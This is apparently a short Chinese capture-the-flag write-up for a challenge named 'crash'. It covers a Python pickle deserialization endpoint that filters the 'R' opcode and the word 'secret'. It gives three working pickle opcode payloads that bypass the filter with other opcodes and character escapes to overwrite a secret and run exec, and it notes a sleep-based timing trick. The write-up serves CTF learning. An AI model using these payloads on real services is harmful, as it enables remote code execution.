crash

下载源码，可以看到反序列化接口，过滤了R和secret，题目需要覆盖secret，处理方式：除了R指令码还有其他可以用RCE的指令码，例如i、c等；secret可以通过\x65或\u0065编码绕过，或者使用字符串拼接的方式。

可以使用的payload

opcode=b'''cappadmin(S's\\x65cret'S'admin'db.'''opcode=b'''(cbuiltinsexecS'c="import admin;admin.s\\x65cret='xxx'";exec(c)'o.'''opcode=b'''(S'exec('admin.se'+'cret="123456"')'i__builtin__exec.'''

在负载均衡造成504，可以直接通过py执行命令slepp 10，也可以爆破

Previousbabyweb Nexteasyweb

Last updated 3 years ago